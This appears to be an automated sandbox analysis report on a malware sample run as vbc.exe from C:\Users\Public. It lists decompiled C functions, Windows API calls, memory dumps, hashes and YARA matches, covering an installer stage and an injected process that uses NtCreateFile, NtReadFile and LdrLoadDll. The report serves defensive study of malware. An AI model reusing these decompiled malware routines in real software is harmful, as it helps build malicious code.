                                                                                                                                                                                                          0x0040618b
                                                                                                                                                                                                          0x00406195
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406195
                                                                                                                                                                                                          0x004061a8

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Call,0042A098,?,?,?,00000002,Call,?,004063E9,80000002), ref: 0040617A
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,004063E9,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,0042A098), ref: 00406185
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseQueryValue
                                                                                                                                                                                                          • String ID: Call
                                                                                                                                                                                                          • API String ID: 3356406503-1824292864
                                                                                                                                                                                                          • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                                                                                                                                                          • Instruction ID: abb308f8f7f3d79eba5fb0d9b58611e130e20d6dfe1a02acdbc1ca07f32112a5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA01BC72500209ABEF22CF60CD09FDB3FA8EF45364F01403AF916E6191D278C964CBA4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004058EC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E004058EC(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42c0c0->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c0c0,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                                                                                                                                          0x004058f5
                                                                                                                                                                                                          0x00405915
                                                                                                                                                                                                          0x0040591d
                                                                                                                                                                                                          0x00405922
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405928
                                                                                                                                                                                                          0x0040592c

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C0C0,Error launching installer), ref: 00405915
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405922
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • Error launching installer, xrefs: 004058FF
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                          • String ID: Error launching installer
                                                                                                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                                                                                                          • Opcode ID: a7bb890bbc051f912148fc8d3d355e884b0c5c28e790f435a07fb0e3f2a9ef73
                                                                                                                                                                                                          • Instruction ID: c507ec532ebc7345b5619acd619b8ed9e71e93050b60d9e59510cdc0b01a46da
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7bb890bbc051f912148fc8d3d355e884b0c5c28e790f435a07fb0e3f2a9ef73
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52E0BFF5600209BFEB109BA5ED45F7F77ADFB04608F404525BD50F2150D77499158A78
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00405C2C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00405C2C(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                                                                                                                                                          0x00405c2d
                                                                                                                                                                                                          0x00405c37
                                                                                                                                                                                                          0x00405c39
                                                                                                                                                                                                          0x00405c40
                                                                                                                                                                                                          0x00405c48
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405c48
                                                                                                                                                                                                          0x00405c4a
                                                                                                                                                                                                          0x00405c4f

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenA.KERNEL32(80000000,C:\Users\Public,00402F5D,C:\Users\Public,C:\Users\Public,C:\Users\Public\vbc.exe,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405C32
                                                                                                                                                                                                          • CharPrevA.USER32(80000000,00000000), ref: 00405C40
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CharPrevlstrlen
                                                                                                                                                                                                          • String ID: C:\Users\Public
                                                                                                                                                                                                          • API String ID: 2709904686-2272764151
                                                                                                                                                                                                          • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                                                                                                                                                          • Instruction ID: 4ba3b1558e7d02da59ab85be258a456d7b40e7fb12288d653d4debc9d62610ac
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2FD0A76240CA706EF30366108C00B8F6A48DF13301F0900A6F081A2190C3BC4C424BFD
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 72E310E0, Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E72E310E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _t17;
				char _t19;
				void* _t20;
				void* _t24;
				void* _t27;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				signed int _t43;
				void* _t52;
				char* _t53;
				char* _t55;
				void* _t56;
				void* _t58;

				 *0x72e3405c = _a8;
				 *0x72e34060 = _a16;
				 *0x72e34064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x72e34038, E72E31556, _t52);
				_t43 =  *0x72e3405c +  *0x72e3405c * 4 << 2;
				_t17 = E72E3123B();
				_a8 = _t17;
				_t53 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_a8);
				} else {
					do {
						_t19 =  *_t53;
						_t55 = _t53 + 1;
						_t58 = _t19 - 0x6c;
						if(_t58 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t53 = _t55 + 1;
								_t24 = E72E31266(E72E312AD( *_t55 - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t27 = _t20;
							if(_t27 == 0) {
								L10:
								_t53 = _t55 + 1;
								_t24 = E72E312D1( *_t55 - 0x30, E72E3123B());
								goto L13;
							}
							L7:
							if(_t27 == 1) {
								_t31 = GlobalAlloc(0x40, _t43 + 4);
								 *_t31 =  *0x72e34030;
								 *0x72e34030 = _t31;
								E72E31508(_t31 + 4,  *0x72e34064, _t43);
								_t56 = _t56 + 0xc;
							}
							goto L14;
						}
						if(_t58 == 0) {
							L17:
							_t34 =  *0x72e34030;
							if( *0x72e34030 != 0) {
								E72E31508( *0x72e34064, _t34 + 4, _t43);
								_t37 =  *0x72e34030;
								_t56 = _t56 + 0xc;
								GlobalFree(_t37);
								 *0x72e34030 =  *_t37;
							}
							goto L14;
						}
						_t39 = _t19 - 0x4c;
						if(_t39 == 0) {
							goto L17;
						}
						_t40 = _t39 - 4;
						if(_t40 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L12;
						}
						_t27 = _t40;
						if(_t27 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t53 != 0);
					goto L16;
				}
			}


















                                                                                                                                                                                                          0x72e310e7
                                                                                                                                                                                                          0x72e310ef
                                                                                                                                                                                                          0x72e31103
                                                                                                                                                                                                          0x72e3110b
                                                                                                                                                                                                          0x72e31116
                                                                                                                                                                                                          0x72e31119
                                                                                                                                                                                                          0x72e31121
                                                                                                                                                                                                          0x72e31124
                                                                                                                                                                                                          0x72e31126
                                                                                                                                                                                                          0x72e311c4
                                                                                                                                                                                                          0x72e311d0
                                                                                                                                                                                                          0x72e3112c
                                                                                                                                                                                                          0x72e3112d
                                                                                                                                                                                                          0x72e3112d
                                                                                                                                                                                                          0x72e31130
                                                                                                                                                                                                          0x72e31131
                                                                                                                                                                                                          0x72e31134
                                                                                                                                                                                                          0x72e31203
                                                                                                                                                                                                          0x72e31206
                                                                                                                                                                                                          0x72e3119e
                                                                                                                                                                                                          0x72e311a4
                                                                                                                                                                                                          0x72e311ac
                                                                                                                                                                                                          0x72e311b1
                                                                                                                                                                                                          0x72e311b4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e311b4
                                                                                                                                                                                                          0x72e31209
                                                                                                                                                                                                          0x72e3120a
                                                                                                                                                                                                          0x72e31186
                                                                                                                                                                                                          0x72e3118c
                                                                                                                                                                                                          0x72e31194
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31194
                                                                                                                                                                                                          0x72e31152
                                                                                                                                                                                                          0x72e31153
                                                                                                                                                                                                          0x72e3115b
                                                                                                                                                                                                          0x72e31168
                                                                                                                                                                                                          0x72e31170
                                                                                                                                                                                                          0x72e31179
                                                                                                                                                                                                          0x72e3117e
                                                                                                                                                                                                          0x72e3117e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31153
                                                                                                                                                                                                          0x72e3113a
                                                                                                                                                                                                          0x72e311d1
                                                                                                                                                                                                          0x72e311d1
                                                                                                                                                                                                          0x72e311d8
                                                                                                                                                                                                          0x72e311e5
                                                                                                                                                                                                          0x72e311ea
                                                                                                                                                                                                          0x72e311ef
                                                                                                                                                                                                          0x72e311f5
                                                                                                                                                                                                          0x72e311fb
                                                                                                                                                                                                          0x72e311fb
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e311d8
                                                                                                                                                                                                          0x72e31140
                                                                                                                                                                                                          0x72e31143
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31149
                                                                                                                                                                                                          0x72e3114c
                                                                                                                                                                                                          0x72e3119b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e3119b
                                                                                                                                                                                                          0x72e3114f
                                                                                                                                                                                                          0x72e31150
                                                                                                                                                                                                          0x72e31183
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31183
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e311ba
                                                                                                                                                                                                          0x72e311ba
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e311c3

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 72E3115B
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 72E311B4
                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 72E311C7
                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 72E311F5
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2167878164.0000000072E31000.00000020.00020000.sdmp, Offset: 72E30000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167873253.0000000072E30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167884351.0000000072E33000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167889901.0000000072E35000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1780285237-0
                                                                                                                                                                                                          • Opcode ID: 39cd5347c46523c77e613e363a985759f6f433a6b0dc7bb7a9f8d0ea5fa53a9a
                                                                                                                                                                                                          • Instruction ID: 053ede8782feb740b2b03d6bab88ab1d7692ee0d699493ab0abcb8cad182cd18
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39cd5347c46523c77e613e363a985759f6f433a6b0dc7bb7a9f8d0ea5fa53a9a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6331BCB6604208AFD7028F6DD948B6D7FFCFB05247BA4A95DE846CA212D7348880CF61
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00405D4B, Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00405D4B(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                                                                                                                                                                          0x00405d5b
                                                                                                                                                                                                          0x00405d5d
                                                                                                                                                                                                          0x00405d60
                                                                                                                                                                                                          0x00405d8c
                                                                                                                                                                                                          0x00405d65
                                                                                                                                                                                                          0x00405d6e
                                                                                                                                                                                                          0x00405d73
                                                                                                                                                                                                          0x00405d7e
                                                                                                                                                                                                          0x00405d81
                                                                                                                                                                                                          0x00405d9d
                                                                                                                                                                                                          0x00405d83
                                                                                                                                                                                                          0x00405d8a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405d8a
                                                                                                                                                                                                          0x00405d96
                                                                                                                                                                                                          0x00405d9a
                                                                                                                                                                                                          0x00405d9a
                                                                                                                                                                                                          0x00405d94
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5B
                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D73
                                                                                                                                                                                                          • CharNextA.USER32(00000000), ref: 00405D84
                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 190613189-0
                                                                                                                                                                                                          • Opcode ID: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                                                                                                                                                                                                          • Instruction ID: 0c063e539c4a2d6313fdce3eb9328f18231664df77b923cface8765f2046746d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0AF0F632104914FFCB02DFA4DD04D9FBBA8EF46350B2580BAE840F7220D634DE019BA9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Analysis Process: vbc.exe PID: 2876 Parent PID: 260 vbc.exeCOMMON

                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                          Function 0041826A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39filenativeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                          • String ID: R=A$R=A
                                                                                                                                                                                                          • API String ID: 2738559852-3742021989
                                                                                                                                                                                                          • Opcode ID: 87485d30aa8cb18a713a80a56a359a952ffbdaac338d5a925230bf6c8ef1f720
                                                                                                                                                                                                          • Instruction ID: d3105f4d5f75fa6480941d81b4b8bd581525c59bab21666af283b4685eccbe10
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87485d30aa8cb18a713a80a56a359a952ffbdaac338d5a925230bf6c8ef1f720
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3F0EC71200108AFCB04DF89DC80DEB77ADAF8C714F158258BE1D97241CA30E8518BA0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00418270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                                          			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d52
				_t12 =  &_a8; // 0x413d52
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                                                                                                                                                                          0x00418273
                                                                                                                                                                                                          0x0041827f
                                                                                                                                                                                                          0x00418287
                                                                                                                                                                                                          0x00418292
                                                                                                                                                                                                          0x004182ad
                                                                                                                                                                                                          0x004182b5
                                                                                                                                                                                                          0x004182b9

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                          • String ID: R=A$R=A
                                                                                                                                                                                                          • API String ID: 2738559852-3742021989
                                                                                                                                                                                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                                                                          • Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0041817A, Relevance: 1.6, APIs: 1, Instructions: 59filenativeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 35%
                                                                                                                                                                                                          			E0041817A(void* __ebx, long __ecx, void* __edx, void* _a1, intOrPtr _a4, intOrPtr _a8, HANDLE* _a12, long _a16, struct _EXCEPTION_RECORD _a20, struct _ERESOURCE_LITE _a24, struct _GUID _a28, long _a32, long _a36, long _a40) {
				signed char _t20;
				long _t25;
				void* _t45;
				void* _t46;
				intOrPtr* _t48;
				long _t50;

				asm("stc");
				if(__ecx >=  *((intOrPtr*)(__edx + 0x53))) {
					 *(__ebx - 0x3b7cd3b3) =  *(__ebx - 0x3b7cd3b3) ^ __ecx;
					asm("adc al, 0x52");
					_t25 = NtCreateFile(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, __ecx, _t20 ^ 0x0000008b, _t50); // executed
					return _t25;
				} else {
					_t26 = _a4;
					_t4 = _t26 + 0xc3c; // 0xc64
					_t48 = _t4;
					E00418DC0(_t45, _a4, _t48,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x27);
					return  *((intOrPtr*)( *_t48))(_a8, _a12, _a16, _a20, _a24, _t46, _t50);
				}
			}









                                                                                                                                                                                                          0x0041817a
                                                                                                                                                                                                          0x0041817e
                                                                                                                                                                                                          0x004181e1
                                                                                                                                                                                                          0x004181e7
                                                                                                                                                                                                          0x0041820d
                                                                                                                                                                                                          0x00418211
                                                                                                                                                                                                          0x00418180
                                                                                                                                                                                                          0x00418183
                                                                                                                                                                                                          0x0041818f
                                                                                                                                                                                                          0x0041818f
                                                                                                                                                                                                          0x00418197
                                                                                                                                                                                                          0x004181b9
                                                                                                                                                                                                          0x004181b9

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                          • Opcode ID: 84ab12f38130ba6374c4d5e4bd2e4226f3d05ceb612b97be0999a57cad77d801
                                                                                                                                                                                                          • Instruction ID: 89afb2f1cf6171b8558e0c7e0ca09a0a510f862957134e4a4b828be0d8d9e918
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84ab12f38130ba6374c4d5e4bd2e4226f3d05ceb612b97be0999a57cad77d801
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF11E2B2204209BBCB08CF98DC84DEB77ADAF8C754B15864DFA5D97241CA30E8518BA4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00409B20(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_t24 = _a8;
				_v8 =  &_v536;
				_t15 = E0041AB50( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF70(_v8, _t24, __eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(__eflags != 0) {
						E0041B1F0(__eflags,  &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419300(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                                                                                                                                          0x00409b29
                                                                                                                                                                                                          0x00409b3c
                                                                                                                                                                                                          0x00409b3f
                                                                                                                                                                                                          0x00409b44
                                                                                                                                                                                                          0x00409b49
                                                                                                                                                                                                          0x00409b53
                                                                                                                                                                                                          0x00409b58
                                                                                                                                                                                                          0x00409b5b
                                                                                                                                                                                                          0x00409b5d
                                                                                                                                                                                                          0x00409b65
                                                                                                                                                                                                          0x00409b6a
                                                                                                                                                                                                          0x00409b6a
                                                                                                                                                                                                          0x00409b71
                                                                                                                                                                                                          0x00409b79
                                                                                                                                                                                                          0x00409b7c
                                                                                                                                                                                                          0x00409b7e
                                                                                                                                                                                                          0x00409b92
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00409b94
                                                                                                                                                                                                          0x00409b9a
                                                                                                                                                                                                          0x00409b4e
                                                                                                                                                                                                          0x00409b4e
                                                                                                                                                                                                          0x00409b4e

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Load
                                                                                                                                                                                                          • String ID:
